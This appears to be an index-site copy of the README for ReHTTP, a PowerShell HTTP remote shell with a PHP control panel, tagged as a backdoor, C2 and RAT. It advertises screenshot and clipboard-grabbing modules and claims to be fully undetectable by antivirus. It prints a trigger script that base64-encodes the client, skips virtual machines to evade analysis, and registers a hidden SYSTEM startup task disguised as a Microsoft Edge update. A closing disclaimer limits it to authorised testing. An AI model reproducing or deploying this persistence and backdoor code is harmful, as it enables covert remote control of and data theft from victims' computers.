Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/jxroot/rehttp

Simple Powershell Http shell With WEB UI
https://github.com/jxroot/rehttp

backdoor c2 exploitation-framework hack javascript kali-linux penetration-testing pentest pentesting php post-exploitation powershell rat red-team termux

Last synced: 5 days ago
JSON representation

Simple Powershell Http shell With WEB UI

Awesome Lists containing this project

README 

        





logo




    ReHTTP


    






   Simple Powershell Http shell With WEB UI 

    




  

    php

  

  

    

  

      CodeFactor 

   



   



  



enter image description here


🤟 Main



    

  • Client list
    • 

  • System Info
    • 

  • Client Status
    • 

  • Set Label
    • 

  • Remove Client
    • 

  • Module
    • 

  • Variable
    • 

  • Event
    • 



💎 Shell


shell tab demo




Run Powershell Command And You Can Add Command in Scheduled  

    

  • Shell Access
    • 



📟 Module


enter image description here


enter image description here


enter image description here


Run Powershell Code as Function Or Module 

note : for use template edit $SERVER_URL in Code


    

  • Add Module
    • 

  • Edit Module
    • 

  • Delete Module
    • 

    --------------templates-----------------------

  • Beep Sound
    • 

  • MessageBox
    • 

  • Download Current Background
    • 

  • Get System IdleTime
    • 

  • Get System LastInput
    • 

  • Get Public IP
    • 

  • Get-Clipboard
    • 

  • Set-Clipboard
    • 

  • Screenshot
    • 

  • OpenLink
    • 



🧮 Variable


enter image description here



enter image description here


Run PHP Code as Variable And Use In PowerShell Script

    

  • Add Variable
    • 

  • Edit Variable
    • 

  • Delete Variable
    • 

    --------------templates-----------------------

  • random
    • 



📜 History


enter image description here


if Your Client Break You Can Remove Last Command /:

    

  • Show Command And Module
    • 

  • Remove Command
    • 

  • Re Execute Command
    • 



🪄 Event


enter image description here


Run Custom Command 

    

  • First Connection ( Init )
    • 

  • Every Connection ( UP )
    • 

  • Destroy ( Destroy )
    • 



🛠 Dependency


    

  • PHP 5.4 And Higher
    • 

  • Mysql
    • 



🦠 Antivirus


enter image description here


FUD Scan Time + Run Time :)

💿 Installation And Usage


1- Edit $SERVER_URL in Client.ps1


2- Run ps1 script


3- Create Database 


git clone https://github.com/jxroot/ReHTTP.git

cd ReHTTP/Server/

php -S 127.0.0.1:8000 



enter image description here


Triger Example For Client



$s = Get-Content client.ps1 | Out-String

$j = [PSCustomObject]@{

  "Script" = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($s))

} | ConvertTo-Json -Compress

$oneline = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('" + $j + "' | ConvertFrom-Json).Script)) | iex"

$c = [convert]::ToBase64String([System.Text.encoding]::Unicode.GetBytes($oneline))

$template = '

$VM=get-wmiobject win32_computersystem |select -ExpandProperty Model

if(($VM -NotLike "*VMware*") -and ($VM -NotLike "VirtualBox")){

$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument " -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded  '+ $c + '" 

$trigger = New-ScheduledTaskTrigger -AtStartup 

$settings = New-ScheduledTaskSettingsSet -Hidden

$user = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest  

Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUAS" -TaskPath "\"  -Action $action -Settings $settings -Trigger $trigger -Principal $user

Start-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUAS" 

}



'

New-Item -Path . -Name evil.ps1 -Value $template -Force





💻 Operating Systems Tested


    

  • Windows 7
    • 

  • Windows 10
    • 

  • Windows 11
    • 



📹 YouTube Tutorials


How Install And Usage ReHTTP



🔱 Next Update


    

  • fix  ui bugs
    • 

  • clean code 
    • 

  • add event for distroy
    • 

  • add multi exec command for client
    • 

  • upload and  download module
    • 

  • async command
    • 

  • scheduled task ( Date )
    • 

  • background task 
    • 

  • ui for system information and manage like hiorbit
    • 

  • add file manager 
    • 

  • security (xss,csrf,rce,login page,...)
    • 



📧 Contact











## ⚠️ Legal & Ethical Disclaimer



🚨 This tool is developed strictly for educational and authorized security testing purposes only.



🔬 It is intended to help cybersecurity professionals, researchers, and enthusiasts understand post-exploitation, red teaming, and detection techniques in lab or controlled environments.



❌ Do NOT use this tool on any system or network without explicit permission. Unauthorized use may be illegal and unethical.



🛡 The author takes no responsibility for any misuse or damage caused by this project.



---



> Always hack responsibly. 💻🔐